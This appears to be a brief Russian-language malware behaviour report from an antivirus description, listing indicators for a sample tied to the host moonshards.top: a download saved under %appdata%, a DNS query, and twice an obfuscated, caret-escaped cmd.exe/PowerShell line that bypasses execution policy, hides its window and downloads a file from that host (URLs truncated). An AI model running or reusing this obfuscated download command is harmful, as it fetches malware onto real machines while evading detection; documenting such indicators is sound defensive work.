Техническая информация
- http://moonshards.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwERshelL.e^x^e -^EXe^Cu^tiO^NPOlICy BY^P^a^SS^ -NopROFILE -^WINDoW^STYL^E hI^Dde^n ^(nEw-OBj^E^c^T^ ^SYS^tem^.^net^.W^EBcLie^n^t)^.^downloA^D^fIl^e^('http://moonshards.top/...
- DNS ASK mo###hards.top
- '<SYSTEM32>\cmd.exe' /c "POwERshelL.e^x^e -^EXe^Cu^tiO^NPOlICy BY^P^a^SS^ -NopROFILE -^WINDoW^STYL^E hI^Dde^n ^(nEw-OBj^E^c^T^ ^SYS^tem^.^net^.W^EBcLie^n^t)^.^downloA^D^fIl^e^('http://moonshards.top/...' (со скрытым окном)